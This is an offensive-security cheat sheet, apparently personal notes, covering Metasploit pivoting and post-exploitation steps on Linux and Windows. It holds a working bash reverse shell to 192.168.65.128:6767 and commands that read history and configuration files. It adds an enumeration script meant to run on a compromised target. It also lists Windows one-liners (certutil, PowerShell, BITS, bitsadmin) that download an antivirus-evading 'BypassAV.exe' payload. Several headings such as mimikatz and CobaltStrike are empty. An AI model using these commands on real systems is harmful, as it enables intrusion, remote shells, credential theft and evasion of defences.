Metasploit
Generate payload (trojan)
meterpreter
Add a static route (pivot into the internal subnet through the session; run inside the meterpreter session)
run autoroute -s 10.xx.xx.xx/24
Linux
Reverse shell
bash (needs a bash built with /dev/tcp support; dash, the default /bin/sh on Debian-based systems, does not have it):
bash -i >& /dev/tcp/192.168.65.128/6767 0>&1
More:
Information gathering
Inside Docker? (look for docker/lxc/kubepods in PID 1's cgroup)
/proc/1/cgroup
OS / distro version
cat /etc/issue
Kernel version
cat /proc/version
Environment variables (system-wide login profile)
cat /etc/profile
Startup / scheduled tasks (cron)
cat /etc/crontab
Command history
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
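The Linux information-gathering checks above, as an added example script that is not part of the original notes. Each check is a function that takes an optional file path, so it can be pointed at a constructed sample file instead of the live system; the container check also consults the /.dockerenv marker, which matters on cgroup v2 hosts where /proc/1/cgroup alone says nothing. The history file names and the sample crontab/version lines in the checks are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not part of the original notes: the Linux information-
# gathering checks wrapped in functions. Every function takes an optional
# path so it can be run against a constructed sample file offline.

# Container check. Returns 0 when PID 1's cgroup names a container runtime
# or when the /.dockerenv marker exists, non-zero otherwise. Caveat: on
# cgroup v2 hosts /proc/1/cgroup reads just "0::/" even inside Docker, so
# the marker file is the more reliable of the two signals there.
in_container() {
    local cgroup_file="${1:-/proc/1/cgroup}" dockerenv="${2:-/.dockerenv}"
    [ -e "$dockerenv" ] && return 0
    grep -qE 'docker|lxc|kubepods|containerd' "$cgroup_file" 2>/dev/null
}

# Kernel release string from a /proc/version line, e.g. "5.15.0-91-generic".
# This is the value to feed into a kernel exploit search.
kernel_release() {
    local file="${1:-/proc/version}"
    awk '/^Linux version/ { print $3; exit }' "$file" 2>/dev/null
}

# Active (non-comment, non-blank) entries of a crontab-format file.
# Cron is where persistence usually hides.
cron_entries() {
    local file="${1:-/etc/crontab}"
    grep -vE '^[[:space:]]*(#|$)' "$file" 2>/dev/null
    return 0
}

# "name:linecount" for each shell/tool history file present under a home dir.
history_files() {
    local home="${1:-$HOME}" f n
    for f in .bash_history .nano_history .atftp_history .mysql_history .php_history; do
        if [ -f "$home/$f" ]; then
            n=$(wc -l < "$home/$f" | tr -d ' ')
            printf '%s:%s\n' "$f" "$n"
        fi
    done
    return 0
}

# Full report against the live host (runs when the script is executed).
report() {
    if in_container; then echo "[*] container: yes"; else echo "[*] container: no"; fi
    echo "[*] distro : $(head -n1 /etc/issue 2>/dev/null)"
    echo "[*] kernel : $(kernel_release)"
    echo "[*] cron entries:"; cron_entries | sed 's/^/    /'
    echo "[*] history files:"; history_files | sed 's/^/    /'
}

report
```

Run it as `bash enum.sh` on the target; source the file instead to call the individual functions against sample files.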
Windows
Information gathering
Download files
certutil.exe -urlcache -split -f "http://ip:port/BypassAV.exe" bad.txt
powershell Invoke-WebRequest -Uri http://ip:port/BypassAV.exe -OutFile a.exe
powershell Start-BitsTransfer -Source http://ip:port/BypassAV.exe -Destination a.txt
powershell (new-object System.Net.WebClient).DownloadFile('http://ip:port/BypassAV.exe', 'a.exe')
bitsadmin /transfer myDownLoadJob /download /priority normal "http://ip:port/BypassAV.exe" %cd%\a.exe   (bitsadmin requires a full local path as the last argument)
mimikatz
CobaltStrike
SQL injection
Manual injection
SQLmap
Codeql
docker
Links
https://0range-x.github.io/2022/01/26/Domain-penetration_one-stop/